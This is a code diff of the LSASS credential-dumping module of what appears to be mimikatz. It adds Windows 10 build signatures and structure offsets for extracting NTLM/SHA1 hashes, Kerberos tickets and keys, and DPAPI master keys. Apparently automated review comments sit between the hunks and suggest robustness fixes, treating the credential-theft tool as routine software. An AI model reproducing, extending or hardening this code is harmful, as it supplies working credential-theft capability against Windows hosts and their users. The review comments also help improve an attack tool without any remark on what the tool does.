kuhl_m_dpapi_oe_credential_add(sid, NULL, *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword) ? msvCredentials + pMSVHelper->offsetToNtOwfPassword : NULL, *(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword) ? msvCredentials + pMSVHelper->offsetToShaOwPassword : NULL, NULL, NULL);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
{
|
||||
kprintf(L"\n\t * NTLM : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
{
|
||||
kprintf(L"\n\t * SHA1 : ");
|
||||
kull_m_string_wprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
if(sid && (pPrimaryCreds10->isNtOwfPassword || pPrimaryCreds10->ShaOwPassword))
|
||||
kuhl_m_dpapi_oe_credential_add(sid, NULL, pPrimaryCreds10->isNtOwfPassword ? pPrimaryCreds10->NtOwfPassword : NULL, pPrimaryCreds10->isShaOwPassword ? pPrimaryCreds10->ShaOwPassword : NULL, NULL, NULL);
|
||||
}
|
||||
else
|
||||
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
|
||||
break;
|
||||
else kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) (msvCredentials + pMSVHelper->offsetToIso + sizeof(USHORT)));
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) msvCredentials;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
|
||||
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base, sid);
|
||||
break;
|
||||
default:
|
||||
kprintf(L"\n\t * Raw data : ");
|
||||
kull_m_string_wprintf_hex(credentials->Buffer, credentials->Length, 1);
|
||||
kull_m_string_wprintf_hex(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length, 1);
|
||||
}
|
||||
}
|
||||
}
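Review bot: In the new `KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY` case of `kuhl_m_sekurlsa_genericCredsOutput`, every helper offset (`offsetToisLmOwfPassword`, `offsetToShaOwPassword`, `offsetToIso`, …) is dereferenced against `msvCredentials` without checking that it lies within the `Length` bytes of the credential buffer, so a truncated or corrupted blob (e.g. from a damaged minidump) turns into an out-of-bounds read on the local copy. One guard before the `switch` would cover it: `if(((PUNICODE_STRING) mesCreds)->Length < pMSVHelper->structSize) break;` (or the largest offset plus its hash length, if `MSV1_0_PRIMARY_HELPER` carries no size field — I cannot see its definition). The result of `kuhl_m_sekurlsa_msv_helper(pData->cLsass)` is also used unchecked; if it can return NULL for a build missing from its table, add `if(!pMSVHelper) break;` right after the call. On the positive side the rewrite fixes the old `pPrimaryCreds->ShaOwPassword` test (an array, hence always true) by reading `offsetToisShaOwPassword` instead.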
|
||||
|
@ -32,8 +32,7 @@
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10 0x00100000
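Review bot: Renumbering `KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY` from 0x03000000 to 0x02000000 while dropping `_PRIMARY_10` leaves the header without any statement that the values under `KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK` are a small index rather than bit flags, and that any other value (including a stale 0x03000000 from a caller built against the old header) lands in the raw-hex `default:` branch of `kuhl_m_sekurlsa_genericCredsOutput` instead of failing loudly. A comment above the group would pin that contract: `// Credential type: an index under ..._CREDENTIAL_MASK (not bit flags); unlisted values are dumped as raw hex`. If external consumers such as the WinDBG module share this header, the value change is worth a line in the commit description as well.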
|
||||
|
@ -46,8 +46,7 @@ BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKUR
|
||||
|
||||
BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PVOID * genericPtr, PVOID * genericPtr1, PVOID * genericPtr2, PLONG genericOffset1)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, cLsass->hLsassMem}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{pLib->Informations.DllBase.address, cLsass->hLsassMem}, pLib->Informations.SizeOfImage}, NULL};
|
||||
PKULL_M_PATCH_GENERIC currentReference;
|
||||
#ifdef _M_X64
|
||||
@ -104,8 +103,7 @@ BOOL kuhl_m_sekurlsa_utils_search_generic(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL
|
||||
PVOID kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(PKULL_M_MEMORY_ADDRESS pSecurityStruct, ULONG LUIDoffset, PLUID luidToFind)
|
||||
{
|
||||
PVOID resultat = NULL, pStruct;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(aBuffer.address = LocalAlloc(LPTR, LUIDoffset + sizeof(LUID)))
|
||||
{
|
||||
@ -137,8 +135,7 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuid(PKULL_M_MEMORY_ADDRESS pTable, ULONG
|
||||
{
|
||||
PVOID resultat = NULL;
|
||||
RTL_AVL_TABLE maTable;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
|
||||
{
|
||||
@ -152,8 +149,7 @@ PVOID kuhl_m_sekurlsa_utils_pFromAVLByLuidRec(PKULL_M_MEMORY_ADDRESS pTable, ULO
|
||||
{
|
||||
PVOID resultat = NULL;
|
||||
RTL_AVL_TABLE maTable;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS data = {&maTable, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
if(kull_m_memory_copy(&data, pTable, sizeof(RTL_AVL_TABLE)))
|
||||
{
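Review bot: `kuhl_m_sekurlsa_utils_pFromAVLByLuidRec` now hands `&KULL_M_MEMORY_GLOBAL_OWN_HANDLE` to every recursion level where each frame previously owned a private `hBuffer`; that is only safe if nothing on the `kull_m_memory_copy` path ever writes through a `KULL_M_MEMORY_TYPE_OWN` handle, which this section does not let me confirm. If the global is meant to be immutable, say so where it is defined, e.g. `// shared read-only handle for the current process; never pass it to anything that opens, closes or rebinds a handle`, and if the memory API permits it, const-qualify the handle parameter so the compiler enforces the rule. The rest of the AVL and linked-list lookups are unchanged by these hunks.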
|
||||
|
@ -45,8 +45,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_credman(IN PKIWI_BASIC_SECURIT
|
||||
KIWI_CREDMAN_SET_LIST_ENTRY setList;
|
||||
KIWI_CREDMAN_LIST_STARTER listStarter;
|
||||
DWORD nbCred = 0;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &hLocalMemory}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&setList, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {pData->pCredentialManager, pData->cLsass->hLsassMem};
|
||||
PVOID pRef;
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL kiwiCreds;
|
||||
ULONG CredOffsetIndex;
|
||||
|
@ -19,7 +19,7 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WI61_MasterKeyCacheList), PTRN_WI61_MasterKeyCacheList}, {0, NULL}, { 7}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WI62_MasterKeyCacheList), PTRN_WI62_MasterKeyCacheList}, {0, NULL}, {-4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI63_MasterKeyCacheList), PTRN_WI63_MasterKeyCacheList}, {0, NULL}, {-10}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI64_MasterKeyCacheList), PTRN_WI64_MasterKeyCacheList}, {0, NULL}, {-7}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI64_MasterKeyCacheList), PTRN_WI64_MasterKeyCacheList}, {0, NULL}, {-7}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_MasterKeyCacheList[] = {0x33, 0xc0, 0x40, 0xa3};
|
||||
@ -45,8 +45,7 @@ NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aKey = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
|
||||
BYTE dgst[SHA_DIGEST_LENGTH];
|
||||
DWORD monNb = 0;
|
||||
|
@ -13,7 +13,8 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 2}},
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 3}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 5}},
|
||||
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WALL_KerbUnloadLogonSessionTable), PTRN_WALL_KerbUnloadLogonSessionTable}, {0, NULL}, { 6, 6}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_KerbReferenceLogonSession[] = {0x8B, 0x7D, 0x08, 0x8B, 0x17, 0x39, 0x50};
|
||||
@ -27,7 +28,8 @@ KULL_M_PATCH_GENERIC KerberosReferences[] = {
|
||||
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable), PTRN_WNO8_KerbUnloadLogonSessionTable}, {0, NULL}, {-11,3}},
|
||||
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable), PTRN_WIN8_KerbUnloadLogonSessionTable}, {0, NULL}, {-14,4}},
|
||||
{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,4}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,5}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,5}},
|
||||
{KULL_M_WIN_BUILD_10_1511, {sizeof(PTRN_WI10_KerbUnloadLogonSessionTable), PTRN_WI10_KerbUnloadLogonSessionTable}, {0, NULL}, {-15,6}},
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -210,6 +212,41 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_1),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_2),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, Tickets_3),
|
||||
},
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, SmartcardInfos),
|
||||
sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ServiceName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, DomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TargetDomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Description),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, AltTargetDomainName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, ClientName),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketFlags),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, KeyType),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Key),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, StartTime),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, EndTime),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, RenewUntil),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketEncType),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, Ticket),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_6, TicketKvno),
|
||||
sizeof(KIWI_KERBEROS_INTERNAL_TICKET_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, pKeyList),
|
||||
sizeof(KIWI_KERBEROS_KEYS_LIST_6),
|
||||
FIELD_OFFSET(KERB_HASHPASSWORD_6, generic),
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials),
|
||||
@ -287,10 +324,9 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_passwords(IN PKIWI_BASIC_SE
|
||||
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
|
||||
DWORD szCsp;
|
||||
PBYTE infosCsp;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {*(PVOID *) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetSmartCard), pData->cLsass->hLsassMem};
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) LocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds), pData, (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
if(aLsassMemory.address)
|
||||
{
|
||||
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
|
||||
@ -355,7 +391,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalHashMemory, &RemoteLocalKerbSession, i))
|
||||
for(i = 0; i < nbHash; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) ((PBYTE) aLocalHashMemory.address + i * kerbHelper[KerbOffsetIndex].structKeyPasswordHashSize + kerbHelper[KerbOffsetIndex].offsetHashGeneric), pData, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_VISTA) ? KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT : ((pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10)));
|
||||
LocalFree(aLocalHashMemory.address);
|
||||
}
|
||||
}
|
||||
@ -486,8 +522,7 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_kerberos_pth(IN PKIWI_BASIC_SECURITY
|
||||
|
||||
void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKIWI_KERBEROS_ENUM_DATA pEnumData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
if(kuhl_m_sekurlsa_kerberos_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_kerberos_package.Module, KerberosReferences, ARRAYSIZE(KerberosReferences), &KerbLogonSessionListOrTable, NULL, NULL, &KerbOffsetIndex))
|
||||
{
|
||||
aLsassMemory.address = KerbLogonSessionListOrTable;
|
||||
@ -511,8 +546,7 @@ void kuhl_m_sekurlsa_enum_generic_callback_kerberos(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN DWORD grp, IN PVOID tickets, IN BOOL isFile)
|
||||
{
|
||||
PVOID pStruct, pRef = tickets;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &hBuffer}, aTicket = {NULL, &hBuffer}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS data = {&pStruct, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aTicket = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassBuffer = {tickets, pData->cLsass->hLsassMem};
|
||||
DWORD nbTickets = 0;
|
||||
PKIWI_KERBEROS_TICKET pKiwiTicket;
|
||||
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
|
||||
@ -533,7 +567,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
||||
kprintf(L"\n\t [%08x]", nbTickets);
|
||||
if(pKiwiTicket = kuhl_m_sekurlsa_kerberos_createTicket((LPBYTE) aTicket.address, pData->cLsass->hLsassMem))
|
||||
{
|
||||
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
|
||||
isNormalSessionKey = (pData->cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1507) || (pKiwiTicket->Key.Length < (ULONG) FIELD_OFFSET(LSAISO_DATA_BLOB, data));
|
||||
kuhl_m_kerberos_ticket_display(pKiwiTicket, isNormalSessionKey, FALSE);
|
||||
if(isFile)
|
||||
if(filename = kuhl_m_sekurlsa_kerberos_generateFileName(pData->LogonId, grp, nbTickets, pKiwiTicket, MIMIKATZ_KERBEROS_EXT))
|
||||
@ -634,8 +668,7 @@ void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalN
|
||||
BOOL status = FALSE;
|
||||
KERB_EXTERNAL_NAME extName;
|
||||
PKERB_EXTERNAL_NAME pTempName;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &hBuffer};//, aLocalStrings = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aName = {*pExternalName, hLSASS}, aLocalBuffer = {&extName, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
DWORD i;
|
||||
|
||||
if(aName.address)
|
||||
@ -659,8 +692,7 @@ void kuhl_m_sekurlsa_kerberos_createExternalName(PKERB_EXTERNAL_NAME *pExternalN
|
||||
void kuhl_m_sekurlsa_kerberos_createKiwiKerberosBuffer(PKIWI_KERBEROS_BUFFER pBuffer, PKULL_M_MEMORY_HANDLE hLSASS)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pBuffer->Value, hLSASS}, aLocalBuffer = {NULL, &hBuffer};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {pBuffer->Value, hLSASS}, aLocalBuffer = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
|
||||
pBuffer->Value = NULL;
|
||||
if(aBuffer.address)
|
||||
|
@ -30,8 +30,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_livessp(IN PKIWI_BASIC_SECURIT
|
||||
{
|
||||
KIWI_LIVESSP_LIST_ENTRY credentials;
|
||||
KIWI_LIVESSP_PRIMARY_CREDENTIAL primaryCredential;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
|
||||
if(kuhl_m_sekurlsa_livessp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_livessp_package.Module, LiveReferences, ARRAYSIZE(LiveReferences), (PVOID *) &LiveGlobalLogonSessionList, NULL, NULL, NULL))
|
||||
{
|
||||
|
@ -27,69 +27,50 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKURLSA_CON
|
||||
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
|
||||
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
flags |= (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA) pOptionalData, flags);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
